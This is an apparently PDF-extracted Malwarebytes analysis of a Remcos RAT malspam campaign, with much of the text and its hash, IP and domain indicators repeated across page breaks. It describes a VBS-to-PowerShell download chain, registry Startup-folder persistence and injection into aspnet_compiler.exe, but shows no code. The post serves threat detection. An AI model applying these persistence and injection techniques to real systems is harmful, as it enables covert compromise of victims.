\r\n5f06da67169389577ec237bfb0c3e0e9203833048f48081deed7b6201ad18c27 \r\n7519540343e10c7846979809166df1cd0f01087ea53bf20fd5dd416dc6ebad14 \r\ndae93e987a854255ff55ce9f62729f17f57d3f8a56933a57cb8de89b698e81f0 \r\nb61f6b794f38f736e90ae8aa04e5f71acc8d5470c08ef8841c16087b6710a388 \r\n6f4f4f4b980e471c5f8f5d0d95bff5a7ec98e3e2377f18f7fc0d44828cbe33a6 \r\nRelated Remcos Samples:\r\n15cf9daf5bad1a5a78783f675eb63850e216a690e0f3302738ce3bd825ba6fc1\r\n0ea2e136c0604fe2336a37c9d7b5a6150abd58e48311fa625ea375468189931e\r\n8d0dfc2239405eebc7a9d5483492a0225963fae4c110ecbd12f1f39ce1ef937a\r\n22634cbaf1a60ca499a9b692aae881cffdaf205a4755ee34915e5512ea87cab4\r\n898020967dbec06a60b63269d54b15ad968e2f1146f10fdbf22e79e2339425d2\r\nd7aede3e0703ce5ec7bb4c333d4ddb6551fb5032825e756b7132367625107a36\r\na80c2e71f7cc69a729035941d13c79fd210290e7f82cefce14ceef7dba3f3026\r\n1aa8163fc4947fec127350aebc420e4832a5e7a3430109201f6796fc12292dfc\r\n4a7d54b6013b6296df3576a8d62f00cbc4af18fbbbfa97b831c38c664b4d70ce\r\nc55dffdcb320a06872faa4cc7777bafd81051a17533e919fbee3fc27e8f47135\r\nadf94da54bc49abc6fdb2a36523eb726f26dacd5598a0fdc64e61b8d500edad8\r\n59aafb3dd9c6cdb95ff662299e1faf3efb01d5ef8479dbbb8032b4b9cb3c3d91\r\nadf94da54bc49abc6fdb2a36523eb726f26dacd5598a0fdc64e61b8d500edad8\r\n1d969ace725bf5185e64c3c4a6ab122a3ff4eaafe25f56bd8c1d7b7ba2df0aac\r\na54f4ee320b21c1cfde3358a25131476127b9fb1fd5cad9fd03fa2be1f4fd0e2\r\n92a7e167629bd14c88a03ef1b6719acd143082c495972a829f20cc588fd6e084\r\n46b1d3c565a615b2df02a567f507a2dc7f75d088fc2b52b1f1e1ce7a92594175\r\n1a7ceaddf547d47cf7d2d7eda0357d38f489eaeb3b06ea3027ae87df6e5c8195\r\n47287127bcc7bf1502d8b84af3c9050a6b46caa9e1558ab27a2c1b0883505b15\r\n509fb00b3a458a86563737c0ce278f6fb713eafe90da7e14aa0d54566e172a81\r\ne06220108f931bb43ecf136844cdfede4b9a1bbc637b6ff8a3870710e709fe0e\r\n109a40435ad446c7b03af30bb049f55275a659c0271fa7a8a1a59d5871d18c10\r\nhttps://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/\r\nPage 27 of 42\n\n0fe5a7d7d6a2c077b4b641f4d2077f2fa476a2317283323801bed7a7a6770906\r\na465bb35f4e7bafb2fea17156c39daee286e49c3f10463ecb8d29766e2d0b200\r\n0d74a33006727ab086e281681cc8ee3d71ee7843f19b6fa52a86efc92b0444a1\r\n5f06da67169389577ec237bfb0c3e0e9203833048f48081deed7b6201ad18c27\r\n5ca6ae0cf402083bb06f267962b62d812151c8193a6b726ef1b84a2ed7ca5ef2\r\nOther IOCs:\r\n185.19.85.168\r\nia601401.us.archive.org\r\nia601502.us.archive.org\r\nia601405.us.archive.org\r\nia601406.us.archive.org\r\nshugardaddy.ddns.net\r\nch-pool-1194.nvpn.to\r\ntippet.duckdns.org\r\nmail.swissauto.top\r\nrandyphoenix.hopto.org\r\nThis blog post was authored by Erika Noerenberg\r\nIntroduction\r\nOver the past months, Malwarebytes researchers have been tracking a unique malspam campaign delivering the Remcos\r\nremote access trojan (RAT) via financially-themed emails. Remcos is often delivered via malicious documents or archive\r\nfiles containing scripts or executables. Like other RATs, Remcos gives the threat actor full control over the infected system\r\nand allows them to capture keystrokes, screenshots, credentials, or other sensitive system information. Unlike most RATs\r\nused by malicious actors however, Remcos is marketed as an administrative tool by the company Breaking Security which\r\nsells it openly on their website.\r\nDistribution\r\nRemcos often infects a system by embedding a specially-crafted settings file into an Office document, allowing an attacker\r\nto trick a user to run malicious code without additional notification. This variant of Remcos has been observed to be\r\ndistributed via targeted spam emails with an attached archive file. The emails and attachment names have been primarily\r\nfinancially-themed; an example email is shown below:\r\nhttps://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/\r\nPage 28 of 42\n\nFor illustration, the following table lists a sample of email subjects and attachment names from 2021 by date:\r\nDate Subject Attachment Name Contents\r\n21\r\nJan\r\nSeparate\r\nRemittance\r\nAdvice: paper\r\ndocument no –\r\n9604163\r\nPayment Advice.img Payment Advice.vbs\r\n26\r\nApr\r\nAppraisal Report\r\nfor your Loan\r\nApplication-11003354677341\r\nAppraisal.reportl1100335467734.zip\r\nAppraisal.vbs\r\nProperty.hta*\r\n18\r\nMay\r\nFwd: Appraisal\r\nReport for your\r\nLoan\r\nApplication-1100788392210\r\nAppraisalreportl1100788392210.zip Appraisal..vbs\r\n28\r\nJun\r\nFwd: Reminder:\r\nYour July\r\nAppointment-11002214991\r\ntransaction_completed11003456773311..zip Report-Slip.vbs\r\n6 Jul\r\nFwd: Reminder:\r\nYour July\r\nAppointment-11003456773312\r\ntransaction_completed11003456773312.zip\r\nReport-11003456773312.vbs\r\nIn most Remcos spam campaigns, the payload is an executable contained in an attached archive (.zip) or disk image (.img)\r\nfile, though malicious documents are also sometimes used. In this campaign however, the emails contain a zip archive\r\ncontaining a Visual Basic script (.vbs) which downloads and executes additional scripts and finally installs the Remcos\r\npayload.\r\n*Eariler versions also included a “Property.hta” file which only comprised the VB script wrapped in HTML as seen below.\r\nInterestingly, the body of this HTML consisted only of the text “demo”, which indicates this might have been test code.\r\nAnalysis\r\nhttps://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/\r\nPage 29 of 42\n\nRemcos is a fully-functioning RAT that gives the threat actor full control over the infected system and allows them to collect\r\nkeystrokes, audio, video, screenshots, and system information. Because it has full control, Remcos is also able to download\r\nand execute additional software onto the system. This Remcos distribution utilizes a series of scripts that ultimately results\r\nin the injection of a Remcos payload into the Windows system binary aspnet_compiler.exe. A sample infection chain for\r\nthis variant is shown below:\r\nThe samples analyzed below originate from the attachment Appraisalreportl1100788392210.zip (SHA256\r\n4e712de8a3d602ccf55321a85701114c01f9731af356da05fb6e3881a13bb23e). As with all analyzed samples, the the\r\ninfection chain followed the process flow above; the initial Visual Basic script initiates a series of download and execution\r\nof obfuscated scripts that eventually result in the injection of the final Remcos payload into aspnet_compiler.exe.\r\nAlthough the script above is lengthy due to obfuscation, it ultimately amounts to the following simple powershell command\r\nwhich downloads and executes a second Visual Basic script:\r\nhttps://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/\r\nPage 30 of 42\n\nThe first downloaded script (ALL.TXT) also uses simple deobfuscation techniques to perform a few simple tasks. The\r\n$JUANADEARCO variable in this script contains Base64-encoded data which is decoded by the last line of the script (this\r\ndata is shown as decoded in the highlighted box in the image below). This script performs the following actions:\r\nCreates the directory C:UsersPublicRun\r\nDownloads Run_02_02_02.TXT (saved as C:UsersPublicRunRun.vbs)\r\nDownloads Lerveri.txt (saved as UsersPublicRun—–Run+++++++++.ps1)\r\nSets HKCU:SoftwareMicrosoftWindowsCurrentVersionExplorerUser Shell FoldersStartup to “C:UsersPublicRun”\r\nSets HKCU:SoftwareMicrosoftWindowsCurrentVersionExplorerShell FoldersStartup to “C:UsersPublicRun”\r\nThe shell folder registry entries are legacy keys that are still existent for backwards compatibility. Setting the “Startup”\r\nvalue of these registry entries to the malware’s directory of execution effectively sets the contents of that directory to\r\nexecute upon system startup, ensuring persistence.\r\nRun.vbs is obfuscated in a similar fashion to the initial Visual Basic script:\r\nhttps://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/\r\nPage 31 of 42\n\nThis script (deobfuscated below) is responsible only for execution the main powershell script which contains embedded\r\nbinaries, encoded in hex in plaintext.\r\nOne of the binaries encoded in —–Run+++++++++.ps1 is the Remcos payload which is loaded into the legitimate\r\nWindows binary aspnet_compiler.exe. The following function in the powershell script loads the Remcos PE into the binary:\r\nAlthough all of the analyzed Remcos samples of this campaign since January 2021 call back to the same IP address and port,\r\nno actual C2 traffic has been observed. All of the script downloads have pointed to addresses on the legitimate website\r\nus.archive.org, and the payloads have connected (though only via TCP handshake) to the IP address 185.19.85[.]168 on port\r\n8888.\r\nBecause this IP address has not changed over several months, we investigated the passive DNS records to see if the\r\ninfrastructure may have been used in other recent attacks. We found that this IP address had the following resolutions over\r\nthe last few months:\r\nAddress First Seen Last Seen\r\nshugardaddy.ddns.net 26 May 21\r\nch-pool-1194.nvpn.to 24 May 21 30 June 21\r\ntippet.duckdns.org 13 May 21 16 May 21\r\nmail.swissauto.top 29 May 20 11 May 21\r\nrandyphoenix.hopto.org 4 April 21 14 April 21\r\nExamination of this IP address revealed several hosted services on multiple ports. The highlighted date range above is\r\ninteresting as it appears to be a mail server, and Spamhaus Zen classifies this address as blocked due to spam. Furthermore,\r\nanalysis also revealed that the #totalhash malware database contains malware associated with this address going back as far\r\nas 2013. Correlating additional malware associated with this address showed several other versions of Remcos samples\r\nconnecting to the same IP (many to shugardaddy.ddns.net port 5946) – a few recent samples are shown below:\r\nSHA256 Hash\r\nDate Last\r\nSeen\r\n15cf9daf5bad1a5a78783f675eb63850e216a690e0f3302738ce3bd825ba6fc1 6 Jul 21\r\n0ea2e136c0604fe2336a37c9d7b5a6150abd58e48311fa625ea375468189931e 5 Jul 21\r\n8d0dfc2239405eebc7a9d5483492a0225963fae4c110ecbd12f1f39ce1ef937a 29 Jun 21\r\n22634cbaf1a60ca499a9b692aae881cffdaf205a4755ee34915e5512ea87cab4 25 Jun 21\r\n898020967dbec06a60b63269d54b15ad968e2f1146f10fdbf22e79e2339425d2 25 Jun 21\r\nd7aede3e0703ce5ec7bb4c333d4ddb6551fb5032825e756b7132367625107a36 21 Jun 21\r\nOne identifying factor from this campaign is the use of us.archive.org to host payloads. Although this is not unique to\r\nmalware campaigns in general, it is unique to the Remcos campaigns we have analyzed – only the VBS method of\r\ndistribution has been observed to display this behavior.\r\nIn an analysis from Morphisec in March of this year, an HCrypt loader sample was analyzed that demonstrated a similar\r\ninfection chain to the Remcos samples discussed above. Although the stages and scripts are not identical, the intermediary\r\nsteps share a few similarities, such as the file names of the downloaded scripts ALL.txt, Server.txt, and in newer samples,\r\nhttps://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/\r\nPage 32 of 42\n\nBypass.txt. The scripts also have a few function names in common, but the HCrypt samples have anti-analysis and anti-virus\r\nevasion functionality not seen in the Remcos samples. Further research is required to determine whether this set of scripts is\r\na generically available package, or specific to a particular actor and being re-used across campaigns.\r\nAlthough the actor or group behind this campaign is not known, the sporadic nature of the emails distributing this malware\r\nsuggests that it could be targeted in nature. Remcos is a mature trojan that has evolved over many years; though the basic\r\ncapabilities have remained the same, the methodologies of distribution and installation continue to change. Because it is\r\nsoftware that can be purchased openly online, it is difficult to trace or attribute usage to a particular actor. However, given\r\nthe consistency of network infrastructure and installation methodology, it is possible that the motivation or actors behind\r\nthese attacks could be identified. Malwarebytes analysts continue to monitor and track this threat and will update detections\r\nand indicators as needed.\r\nProtection\r\nMalwarebytes protects users from Remcos by using real-time protection.\r\nReferences\r\nhttps://www.anomali.com/blog/threat-actors-use-msbuild-to-deliver-rats-filelessly\r\nhttps://www.cybereason.com/blog/cybereason-exposes-malware-targeting-us-taxpayers\r\nhttps://blog.morphisec.com/tracking-hcrypt-an-active-crypter-as-a-service\r\nIOCs\r\nAnalyzed Samples:\r\nType Name / Subject SHA256\r\nEmail\r\nSubject\r\nFwd: Appraisal Report for your\r\nLoan Application-1100788392210\r\n673b315a95b8c816502ec0dc3cae79cf14e0d7c09139c2fc4b9202fb0\r\nAttachment Appraisalreportl1100788392210.zip 4e712de8a3d602ccf55321a85701114c01f9731af356da05fb6e3881a\r\nExtracted\r\nSample\r\nAppraisal..vbs 1f8853601030ad92bd78fd3f0fbf39eacd2f39f47317914b67aa26dfd5\r\nRemcos VB Scripts:\r\nhttps://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/\r\nPage 33 of 42\n\n92a7e167629bd14c88a03ef1b6719acd143082c495972a829f20cc588fd6e084 \r\nb1849476d3b8900288d6bf7c9ac229eba5e64d665398302a0842c335259f6560 \r\nba4b51ae64c68b32d126322b51b41dce7c300c01faed97aca35ff142e121a914 \r\n5a69f279426b012b64a3099d778cd57aeca9db135d9701c2e11f71d55c3fb5e3 \r\ndb01d69a7ae17947f77b50cfb03b2be6b784eeecdabfbb966b61ecdb3490d3ad \r\n109a40435ad446c7b03af30bb049f55275a659c0271fa7a8a1a59d5871d18c10 \r\na5ae2e0f9a8f1c50e21ea93f4a195097753cd16436ffa4e946add38da873c8cb \r\na465bb35f4e7bafb2fea17156c39daee286e49c3f10463ecb8d29766e2d0b200 \r\nd2d9b66c9aad0e6cc20a786a89299a8b4a65a5a344db369dfd7bfbad3fb40b55 \r\n5f06da67169389577ec237bfb0c3e0e9203833048f48081deed7b6201ad18c27 \r\n7519540343e10c7846979809166df1cd0f01087ea53bf20fd5dd416dc6ebad14 \r\ndae93e987a854255ff55ce9f62729f17f57d3f8a56933a57cb8de89b698e81f0 \r\nb61f6b794f38f736e90ae8aa04e5f71acc8d5470c08ef8841c16087b6710a388 \r\n6f4f4f4b980e471c5f8f5d0d95bff5a7ec98e3e2377f18f7fc0d44828cbe33a6 \r\nRelated Remcos Samples:\r\n15cf9daf5bad1a5a78783f675eb63850e216a690e0f3302738ce3bd825ba6fc1\r\n0ea2e136c0604fe2336a37c9d7b5a6150abd58e48311fa625ea375468189931e\r\n8d0dfc2239405eebc7a9d5483492a0225963fae4c110ecbd12f1f39ce1ef937a\r\n22634cbaf1a60ca499a9b692aae881cffdaf205a4755ee34915e5512ea87cab4\r\n898020967dbec06a60b63269d54b15ad968e2f1146f10fdbf22e79e2339425d2\r\nd7aede3e0703ce5ec7bb4c333d4ddb6551fb5032825e756b7132367625107a36\r\na80c2e71f7cc69a729035941d13c79fd210290e7f82cefce14ceef7dba3f3026\r\n1aa8163fc4947fec127350aebc420e4832a5e7a3430109201f6796fc12292dfc\r\n4a7d54b6013b6296df3576a8d62f00cbc4af18fbbbfa97b831c38c664b4d70ce\r\nc55dffdcb320a06872faa4cc7777bafd81051a17533e919fbee3fc27e8f47135\r\nadf94da54bc49abc6fdb2a36523eb726f26dacd5598a0fdc64e61b8d500edad8\r\n59aafb3dd9c6cdb95ff662299e1faf3efb01d5ef8479dbbb8032b4b9cb3c3d91\r\nadf94da54bc49abc6fdb2a36523eb726f26dacd5598a0fdc64e61b8d500edad8\r\n1d969ace725bf5185e64c3c4a6ab122a3ff4eaafe25f56bd8c1d7b7ba2df0aac\r\na54f4ee320b21c1cfde3358a25131476127b9fb1fd5cad9fd03fa2be1f4fd0e2\r\n92a7e167629bd14c88a03ef1b6719acd143082c495972a829f20cc588fd6e084\r\n46b1d3c565a615b2df02a567f507a2dc7f75d088fc2b52b1f1e1ce7a92594175\r\n1a7ceaddf547d47cf7d2d7eda0357d38f489eaeb3b06ea3027ae87df6e5c8195\r\n47287127bcc7bf1502d8b84af3c9050a6b46caa9e1558ab27a2c1b0883505b15\r\n509fb00b3a458a86563737c0ce278f6fb713eafe90da7e14aa0d54566e172a81\r\ne06220108f931bb43ecf136844cdfede4b9a1bbc637b6ff8a3870710e709fe0e\r\n109a40435ad446c7b03af30bb049f55275a659c0271fa7a8a1a59d5871d18c10\r\n0fe5a7d7d6a2c077b4b641f4d2077f2fa476a2317283323801bed7a7a6770906\r\na465bb35f4e7bafb2fea17156c39daee286e49c3f10463ecb8d29766e2d0b200\r\n0d74a33006727ab086e281681cc8ee3d71ee7843f19b6fa52a86efc92b0444a1\r\n5f06da67169389577ec237bfb0c3e0e9203833048f48081deed7b6201ad18c27\r\n5ca6ae0cf402083bb06f267962b62d812151c8193a6b726ef1b84a2ed7ca5ef2\r\nOther IOCs:\r\n185.19.85.168\r\nia601401.us.archive.org\r\nia601502.us.archive.org\r\nia601405.us.archive.org\r\nia601406.us.archive.org\r\nshugardaddy.ddns.net\r\nch-pool-1194.nvpn.to\r\ntippet.duckdns.org\r\nhttps://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/\r\nPage 34 of 42\n\nmail.swissauto.top\r\nrandyphoenix.hopto.org\r\nRelated Remcos Samples:\r\n15cf9daf5bad1a5a78783f675eb63850e216a690e0f3302738ce3bd825ba6fc1\r\n0ea2e136c0604fe2336a37c9d7b5a6150abd58e48311fa625ea375468189931e\r\n8d0dfc2239405eebc7a9d5483492a0225963fae4c110ecbd12f1f39ce1ef937a\r\n22634cbaf1a60ca499a9b692aae881cffdaf205a4755ee34915e5512ea87cab4\r\n898020967dbec06a60b63269d54b15ad968e2f1146f10fdbf22e79e2339425d2\r\nd7aede3e0703ce5ec7bb4c333d4ddb6551fb5032825e756b7132367625107a36\r\na80c2e71f7cc69a729035941d13c79fd210290e7f82cefce14ceef7dba3f3026\r\n1aa8163fc4947fec127350aebc420e4832a5e7a3430109201f6796fc12292dfc\r\n4a7d54b6013b6296df3576a8d62f00cbc4af18fbbbfa97b831c38c664b4d70ce\r\nc55dffdcb320a06872faa4cc7777bafd81051a17533e919fbee3fc27e8f47135\r\nadf94da54bc49abc6fdb2a36523eb726f26dacd5598a0fdc64e61b8d500edad8\r\n59aafb3dd9c6cdb95ff662299e1faf3efb01d5ef8479dbbb8032b4b9cb3c3d91\r\nadf94da54bc49abc6fdb2a36523eb726f26dacd5598a0fdc64e61b8d500edad8\r\n1d969ace725bf5185e64c3c4a6ab122a3ff4eaafe25f56bd8c1d7b7ba2df0aac\r\na54f4ee320b21c1cfde3358a25131476127b9fb1fd5cad9fd03fa2be1f4fd0e2\r\n92a7e167629bd14c88a03ef1b6719acd143082c495972a829f20cc588fd6e084\r\n46b1d3c565a615b2df02a567f507a2dc7f75d088fc2b52b1f1e1ce7a92594175\r\n1a7ceaddf547d47cf7d2d7eda0357d38f489eaeb3b06ea3027ae87df6e5c8195\r\n47287127bcc7bf1502d8b84af3c9050a6b46caa9e1558ab27a2c1b0883505b15\r\n509fb00b3a458a86563737c0ce278f6fb713eafe90da7e14aa0d54566e172a81\r\ne06220108f931bb43ecf136844cdfede4b9a1bbc637b6ff8a3870710e709fe0e\r\n109a40435ad446c7b03af30bb049f55275a659c0271fa7a8a1a59d5871d18c10\r\n0fe5a7d7d6a2c077b4b641f4d2077f2fa476a2317283323801bed7a7a6770906\r\na465bb35f4e7bafb2fea17156c39daee286e49c3f10463ecb8d29766e2d0b200\r\n0d74a33006727ab086e281681cc8ee3d71ee7843f19b6fa52a86efc92b0444a1\r\n5f06da67169389577ec237bfb0c3e0e9203833048f48081deed7b6201ad18c27\r\n5ca6ae0cf402083bb06f267962b62d812151c8193a6b726ef1b84a2ed7ca5ef2\r\nOther IOCs:\r\n185.19.85.168\r\nia601401.us.archive.org\r\nia601502.us.archive.org\r\nia601405.us.archive.org\r\nia601406.us.archive.org\r\nshugardaddy.ddns.net\r\nch-pool-1194.nvpn.to\r\ntippet.duckdns.org\r\nmail.swissauto.top\r\nrandyphoenix.hopto.org\r\nThis blog post was authored by Erika Noerenberg\r\nIntroduction\r\nOver the past months, Malwarebytes researchers have been tracking a unique malspam campaign delivering the Remcos\r\nremote access trojan (RAT) via financially-themed emails. Remcos is often delivered via malicious documents or archive\r\nfiles containing scripts or executables. Like other RATs, Remcos gives the threat actor full control over the infected system\r\nand allows them to capture keystrokes, screenshots, credentials, or other sensitive system information. Unlike most RATs\r\nused by malicious actors however, Remcos is marketed as an administrative tool by the company Breaking Security which\r\nsells it openly on their website.\r\nhttps://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/\r\nPage 35 of 42\n\nDistribution\r\nRemcos often infects a system by embedding a specially-crafted settings file into an Office document, allowing an attacker\r\nto trick a user to run malicious code without additional notification. This variant of Remcos has been observed to be\r\ndistributed via targeted spam emails with an attached archive file. The emails and attachment names have been primarily\r\nfinancially-themed; an example email is shown below:\r\nFor illustration, the following table lists a sample of email subjects and attachment names from 2021 by date:\r\nDate Subject Attachment Name Contents\r\n21\r\nJan\r\nSeparate\r\nRemittance\r\nAdvice: paper\r\ndocument no –\r\n9604163\r\nPayment Advice.img Payment Advice.vbs\r\n26\r\nApr\r\nAppraisal Report\r\nfor your Loan\r\nApplication-11003354677341\r\nAppraisal.reportl1100335467734.zip\r\nAppraisal.vbs\r\nProperty.hta*\r\n18\r\nMay\r\nFwd: Appraisal\r\nReport for your\r\nLoan\r\nApplication-1100788392210\r\nAppraisalreportl1100788392210.zip Appraisal..vbs\r\n28\r\nJun\r\nFwd: Reminder:\r\nYour July\r\nAppointment-11002214991\r\ntransaction_completed11003456773311..zip Report-Slip.vbs\r\n6 Jul\r\nFwd: Reminder:\r\nYour July\r\nAppointment-11003456773312\r\ntransaction_completed11003456773312.zip\r\nReport-11003456773312.vbs\r\nhttps://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/\r\nPage 36 of 42\n\nIn most Remcos spam campaigns, the payload is an executable contained in an attached archive (.zip) or disk image (.img)\r\nfile, though malicious documents are also sometimes used. In this campaign however, the emails contain a zip archive\r\ncontaining a Visual Basic script (.vbs) which downloads and executes additional scripts and finally installs the Remcos\r\npayload.\r\n*Eariler versions also included a “Property.hta” file which only comprised the VB script wrapped in HTML as seen below.\r\nInterestingly, the body of this HTML consisted only of the text “demo”, which indicates this might have been test code.\r\nAnalysis\r\nRemcos is a fully-functioning RAT that gives the threat actor full control over the infected system and allows them to collect\r\nkeystrokes, audio, video, screenshots, and system information. Because it has full control, Remcos is also able to download\r\nand execute additional software onto the system. This Remcos distribution utilizes a series of scripts that ultimately results\r\nin the injection of a Remcos payload into the Windows system binary aspnet_compiler.exe. A sample infection chain for\r\nthis variant is shown below:\r\nThe samples analyzed below originate from the attachment Appraisalreportl1100788392210.zip (SHA256\r\n4e712de8a3d602ccf55321a85701114c01f9731af356da05fb6e3881a13bb23e). As with all analyzed samples, the the\r\ninfection chain followed the process flow above; the initial Visual Basic script initiates a series of download and execution\r\nof obfuscated scripts that eventually result in the injection of the final Remcos payload into aspnet_compiler.exe.\r\nhttps://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/\r\nPage 37 of 42\n\nAlthough the script above is lengthy due to obfuscation, it ultimately amounts to the following simple powershell command\r\nwhich downloads and executes a second Visual Basic script:\r\nThe first downloaded script (ALL.TXT) also uses simple deobfuscation techniques to perform a few simple tasks. The\r\n$JUANADEARCO variable in this script contains Base64-encoded data which is decoded by the last line of the script (this\r\ndata is shown as decoded in the highlighted box in the image below). This script performs the following actions:\r\nCreates the directory C:UsersPublicRun\r\nDownloads Run_02_02_02.TXT (saved as C:UsersPublicRunRun.vbs)\r\nDownloads Lerveri.txt (saved as UsersPublicRun—–Run+++++++++.ps1)\r\nSets HKCU:SoftwareMicrosoftWindowsCurrentVersionExplorerUser Shell FoldersStartup to “C:UsersPublicRun”\r\nSets HKCU:SoftwareMicrosoftWindowsCurrentVersionExplorerShell FoldersStartup to “C:UsersPublicRun”\r\nThe shell folder registry entries are legacy keys that are still existent for backwards compatibility. Setting the “Startup”\r\nvalue of these registry entries to the malware’s directory of execution effectively sets the contents of that directory to\r\nexecute upon system startup, ensuring persistence.\r\nhttps://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/\r\nPage 38 of 42\n\nRun.vbs is obfuscated in a similar fashion to the initial Visual Basic script:\r\nThis script (deobfuscated below) is responsible only for execution the main powershell script which contains embedded\r\nbinaries, encoded in hex in plaintext.\r\nOne of the binaries encoded in —–Run+++++++++.ps1 is the Remcos payload which is loaded into the legitimate\r\nWindows binary aspnet_compiler.exe. The following function in the powershell script loads the Remcos PE into the binary:\r\nAlthough all of the analyzed Remcos samples of this campaign since January 2021 call back to the same IP address and port,\r\nno actual C2 traffic has been observed. All of the script downloads have pointed to addresses on the legitimate website\r\nus.archive.org, and the payloads have connected (though only via TCP handshake) to the IP address 185.19.85[.]168 on port\r\n8888.\r\nhttps://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/\r\nPage 39 of 42\n\nBecause this IP address has not changed over several months, we investigated the passive DNS records to see if the\r\ninfrastructure may have been used in other recent attacks. We found that this IP address had the following resolutions over\r\nthe last few months:\r\nAddress First Seen Last Seen\r\nshugardaddy.ddns.net 26 May 21\r\nch-pool-1194.nvpn.to 24 May 21 30 June 21\r\ntippet.duckdns.org 13 May 21 16 May 21\r\nmail.swissauto.top 29 May 20 11 May 21\r\nrandyphoenix.hopto.org 4 April 21 14 April 21\r\nExamination of this IP address revealed several hosted services on multiple ports. The highlighted date range above is\r\ninteresting as it appears to be a mail server, and Spamhaus Zen classifies this address as blocked due to spam. Furthermore,\r\nanalysis also revealed that the #totalhash malware database contains malware associated with this address going back as far\r\nas 2013. Correlating additional malware associated with this address showed several other versions of Remcos samples\r\nconnecting to the same IP (many to shugardaddy.ddns.net port 5946) – a few recent samples are shown below:\r\nSHA256 Hash\r\nDate Last\r\nSeen\r\n15cf9daf5bad1a5a78783f675eb63850e216a690e0f3302738ce3bd825ba6fc1 6 Jul 21\r\n0ea2e136c0604fe2336a37c9d7b5a6150abd58e48311fa625ea375468189931e 5 Jul 21\r\n8d0dfc2239405eebc7a9d5483492a0225963fae4c110ecbd12f1f39ce1ef937a 29 Jun 21\r\n22634cbaf1a60ca499a9b692aae881cffdaf205a4755ee34915e5512ea87cab4 25 Jun 21\r\n898020967dbec06a60b63269d54b15ad968e2f1146f10fdbf22e79e2339425d2 25 Jun 21\r\nd7aede3e0703ce5ec7bb4c333d4ddb6551fb5032825e756b7132367625107a36 21 Jun 21\r\nOne identifying factor from this campaign is the use of us.archive.org to host payloads. Although this is not unique to\r\nmalware campaigns in general, it is unique to the Remcos campaigns we have analyzed – only the VBS method of\r\ndistribution has been observed to display this behavior.\r\nIn an analysis from Morphisec in March of this year, an HCrypt loader sample was analyzed that demonstrated a similar\r\ninfection chain to the Remcos samples discussed above. Although the stages and scripts are not identical, the intermediary\r\nsteps share a few similarities, such as the file names of the downloaded scripts ALL.txt, Server.txt, and in newer samples,\r\nBypass.txt. The scripts also have a few function names in common, but the HCrypt samples have anti-analysis and anti-virus\r\nevasion functionality not seen in the Remcos samples. Further research is required to determine whether this set of scripts is\r\na generically available package, or specific to a particular actor and being re-used across campaigns.\r\nAlthough the actor or group behind this campaign is not known, the sporadic nature of the emails distributing this malware\r\nsuggests that it could be targeted in nature. Remcos is a mature trojan that has evolved over many years; though the basic\r\ncapabilities have remained the same, the methodologies of distribution and installation continue to change. Because it is\r\nsoftware that can be purchased openly online, it is difficult to trace or attribute usage to a particular actor. However, given\r\nthe consistency of network infrastructure and installation methodology, it is possible that the motivation or actors behind\r\nthese attacks could be identified. Malwarebytes analysts continue to monitor and track this threat and will update detections\r\nand indicators as needed.\r\nProtection\r\nMalwarebytes protects users from Remcos by using real-time protection.\r\nhttps://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/\r\nPage 40 of 42\n\nReferences\r\nhttps://www.anomali.com/blog/threat-actors-use-msbuild-to-deliver-rats-filelessly\r\nhttps://www.cybereason.com/blog/cybereason-exposes-malware-targeting-us-taxpayers\r\nhttps://blog.morphisec.com/tracking-hcrypt-an-active-crypter-as-a-service\r\nIOCs\r\nAnalyzed Samples:\r\nType Name / Subject SHA256\r\nEmail\r\nSubject\r\nFwd: Appraisal Report for your\r\nLoan Application-1100788392210\r\n673b315a95b8c816502ec0dc3cae79cf14e0d7c09139c2fc4b9202fb0\r\nAttachment Appraisalreportl1100788392210.zip 4e712de8a3d602ccf55321a85701114c01f9731af356da05fb6e3881a\r\nExtracted\r\nSample\r\nAppraisal..vbs 1f8853601030ad92bd78fd3f0fbf39eacd2f39f47317914b67aa26dfd5\r\nRemcos VB Scripts:\r\n92a7e167629bd14c88a03ef1b6719acd143082c495972a829f20cc588fd6e084 \r\nb1849476d3b8900288d6bf7c9ac229eba5e64d665398302a0842c335259f6560 \r\nba4b51ae64c68b32d126322b51b41dce7c300c01faed97aca35ff142e121a914 \r\n5a69f279426b012b64a3099d778cd57aeca9db135d9701c2e11f71d55c3fb5e3 \r\ndb01d69a7ae17947f77b50cfb03b2be6b784eeecdabfbb966b61ecdb3490d3ad \r\n109a40435ad446c7b03af30bb049f55275a659c0271fa7a8a1a59d5871d18c10 \r\na5ae2e0f9a8f1c50e21ea93f4a195097753cd16436ffa4e946add38da873c8cb \r\na465bb35f4e7bafb2fea17156c39daee286e49c3f10463ecb8d29766e2d0b200 \r\nd2d9b66c9aad0e6cc20a786a89299a8b4a65a5a344db369dfd7bfbad3fb40b55 \r\n5f06da67169389577ec237bfb0c3e0e9203833048f48081deed7b6201ad18c27 \r\n7519540343e10c7846979809166df1cd0f01087ea53bf20fd5dd416dc6ebad14 \r\ndae93e987a854255ff55ce9f62729f17f57d3f8a56933a57cb8de89b698e81f0 \r\nb61f6b794f38f736e90ae8aa04e5f71acc8d5470c08ef8841c16087b6710a388 \r\n6f4f4f4b980e471c5f8f5d0d95bff5a7ec98e3e2377f18f7fc0d44828cbe33a6 \r\nhttps://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/\r\nPage 41 of 42\n\nRelated Remcos 